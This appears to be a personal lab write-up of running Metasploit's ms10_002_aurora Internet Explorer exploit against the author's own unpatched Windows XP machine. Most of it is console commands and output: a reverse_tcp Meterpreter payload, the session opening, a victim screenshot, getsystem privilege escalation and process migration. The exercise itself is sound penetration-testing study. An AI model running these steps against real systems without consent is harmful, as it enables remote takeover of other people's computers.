I’m following instruction given in Metasploit: The Penetration Tester’s Guide - Chapter 8 (Exploitation Using Client-Side Attacks).
Details of the target machine on my Virtual Hacking Lab:
Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.
Metasploit describe this exploit thus:
This module exploits a memory corruption flaw in Internet Explorer. This flaw was found in the wild and was a key component of the “Operation Aurora” attacks that lead to the compromise of a number of high profile companies. The exploit code is a direct port of the public sample published to the Wepawet malware analysis site. The technique used by this module is currently identical to the public sample, as such, only Internet Explorer 6 can be reliably exploited.
This is my first client-side exploit and I must say I rather enjoyed it.
Firstly to Metasploit to set up the exploit:
msf > use windows/browser/ms10_002_aurora
msf exploit(ms10_002_aurora) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_002_aurora) > set SRVPORT 80
SRVPORT => 80
msf exploit(ms10_002_aurora) > set URIPATH /
URIPATH => /
msf exploit(ms10_002_aurora) > set LHOST 192.168.1.70 <– This is my IP (The attacking machine)
LHOST => 192.168.1.70
msf exploit(ms10_002_aurora) > set LPORT 443
LPORT => 443
msf exploit(ms10_002_aurora) > exploit -z
[*] Exploit running as background job.[*] Started reverse handler on 192.168.1.70:443
[*] Using URL: http://0.0.0.0:80/[*] Local IP: http://192.168.1.70:80/
[*] Server started.
Then I opened Internet Explorer on the target Windows system and entered the IP of the attacking machine in the browser.
At the same time I opened the Task Manager and watched the memory usage for iexplore.exe jump from 3-5,000K to over 300,000K as the exploit filled the heap.
Back to the attacking machine and Metasploit:
msf exploit(ms10_002_aurora) > [*] 192.168.1.79 ms10_002_aurora – Sending Internet Explorer “Aurora” Memory Corruption
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:443 -> 192.168.1.79:1115) at 2013-07-19 14:53:29 +0100msf exploit(ms10_002_aurora) >
I then wanted a Meterpreter shell:
msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…meterpreter >
I took a screenshot of the victim machine:
meterpreter > screenshot
I then wanted to escalate my privileges:
meterpreter > getsystem
…got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
I thought I’d best migrate the process in case Explorer was shut down:
meterpreter > run post/windows/manage/migrate
[*] Running module against LAB
[*] Current server process: IEXPLORE.EXE (3156)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2720
[+] Successfully migrated to process 2720
meterpreter >
Job done and good fun.